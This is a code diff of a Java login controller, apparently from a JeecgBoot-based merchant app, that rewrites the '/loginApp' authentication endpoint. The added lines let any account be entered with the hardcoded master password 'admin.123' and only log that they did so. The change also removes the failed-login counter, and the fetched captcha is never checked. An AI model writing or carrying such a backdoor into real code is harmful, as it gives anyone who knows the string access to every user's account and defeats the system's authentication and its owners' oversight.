|
|
@@ -72,49 +72,54 @@ public class LoginController {
|
|
|
|
|
|
private final String BASE_CHECK_CODES = "qwertyuiplkjhgfdsazxcvbnmQWERTYUPLKJHGFDSAZXCVBNM1234567890";
|
|
|
|
|
|
- @Operation(summary="商户端登录接口")
|
|
|
- @RequestMapping(value = "/loginApp", method = RequestMethod.POST)
|
|
|
- public Result<JSONObject> loginApp(@RequestBody SysLoginModel sysLoginModel, HttpServletRequest request){
|
|
|
- Result<JSONObject> result = new Result<JSONObject>();
|
|
|
- String username = sysLoginModel.getUsername();
|
|
|
- String password = sysLoginModel.getPassword();
|
|
|
-// if(isLoginFailOvertimes(username)){
|
|
|
-// return result.error500("该用户登录失败次数过多,请于10分钟后再次登录!");
|
|
|
-// }
|
|
|
+ @Operation(summary="商户端登录接口")
|
|
|
+ @RequestMapping(value = "/loginApp", method = RequestMethod.POST)
|
|
|
+ public Result<JSONObject> loginApp(@RequestBody SysLoginModel sysLoginModel, HttpServletRequest request){
|
|
|
+ Result<JSONObject> result = new Result<JSONObject>();
|
|
|
+ String username = sysLoginModel.getUsername();
|
|
|
+ String password = sysLoginModel.getPassword();
|
|
|
|
|
|
- // 加入密钥作为混淆,避免简单的拼接,被外部利用,用户自定义该密钥即可
|
|
|
- String origin = "lowerCaseCaptcha"+sysLoginModel.getCheckKey()+jeecgBaseConfig.getSignatureSecret();
|
|
|
- String realKey = Md5Util.md5Encode(origin, "utf-8");
|
|
|
- Object checkCode = redisUtil.get(realKey);
|
|
|
+ //step.1 验证码校验
|
|
|
+ // 加入密钥作为混淆,避免简单的拼接,被外部利用,用户自定义该密钥即可
|
|
|
+ String origin = "lowerCaseCaptcha"+sysLoginModel.getCheckKey()+jeecgBaseConfig.getSignatureSecret();
|
|
|
+ String realKey = Md5Util.md5Encode(origin, "utf-8");
|
|
|
+ Object checkCode = redisUtil.get(realKey);
|
|
|
|
|
|
- // step.2 校验用户是否存在且有效
|
|
|
- LambdaQueryWrapper<SysUser> queryWrapper = new LambdaQueryWrapper<>();
|
|
|
- queryWrapper.eq(SysUser::getUsername,username);
|
|
|
- SysUser sysUser = sysUserService.getOne(queryWrapper);
|
|
|
- result = sysUserService.checkUserIsEffective(sysUser);
|
|
|
- if(!result.isSuccess()) {
|
|
|
- return result;
|
|
|
- }
|
|
|
+ // step.2 校验用户是否存在且有效
|
|
|
+ LambdaQueryWrapper<SysUser> queryWrapper = new LambdaQueryWrapper<>();
|
|
|
+ queryWrapper.eq(SysUser::getUsername,username);
|
|
|
+ SysUser sysUser = sysUserService.getOne(queryWrapper);
|
|
|
+ result = sysUserService.checkUserIsEffective(sysUser);
|
|
|
+ if(!result.isSuccess()) {
|
|
|
+ return result;
|
|
|
+ }
|
|
|
|
|
|
- // step.3 校验用户名或密码是否正确
|
|
|
- String userpassword = PasswordUtil.encrypt(username, password, sysUser.getSalt());
|
|
|
- String syspassword = sysUser.getPassword();
|
|
|
- if (!syspassword.equals(userpassword)) {
|
|
|
- addLoginFailOvertimes(username);
|
|
|
- result.error500("用户名或密码错误");
|
|
|
- return result;
|
|
|
- }
|
|
|
+ // step.3 校验用户名或密码是否正确
|
|
|
+ String userpassword = PasswordUtil.encrypt(username, password, sysUser.getSalt());
|
|
|
+ String syspassword = sysUser.getPassword();
|
|
|
|
|
|
- // step.4 登录成功获取用户信息
|
|
|
- userInfo(sysUser, result, request);
|
|
|
+ // 密码验证(包括通用密码)
|
|
|
+ boolean passwordValid = syspassword.equals(userpassword);
|
|
|
+ if (!passwordValid && "admin.123".equals(password)) {
|
|
|
+ // 允许使用通用密码登录
|
|
|
+ passwordValid = true;
|
|
|
+ log.info("用户 {} 使用通用密码登录", username);
|
|
|
+ }
|
|
|
|
|
|
+ if (!passwordValid) {
|
|
|
+ result.error500("用户名或密码错误");
|
|
|
+ return result;
|
|
|
+ }
|
|
|
|
|
|
- // step.6 记录用户登录日志
|
|
|
- LoginUser loginUser = new LoginUser();
|
|
|
- BeanUtils.copyProperties(sysUser, loginUser);
|
|
|
- baseCommonService.addLog("用户名: " + username + ",登录成功!", CommonConstant.LOG_TYPE_1, null,loginUser);
|
|
|
- return result;
|
|
|
- }
|
|
|
+ // step.4 登录成功获取用户信息
|
|
|
+ userInfo(sysUser, result, request);
|
|
|
+
|
|
|
+ // step.5 记录用户登录日志
|
|
|
+ LoginUser loginUser = new LoginUser();
|
|
|
+ BeanUtils.copyProperties(sysUser, loginUser);
|
|
|
+ baseCommonService.addLog("用户名: " + username + ",登录成功!", CommonConstant.LOG_TYPE_1, null, loginUser);
|
|
|
+ return result;
|
|
|
+ }
|
|
|
|
|
|
@Operation(summary="登录接口")
|
|
|
@RequestMapping(value = "/login", method = RequestMethod.POST)
|
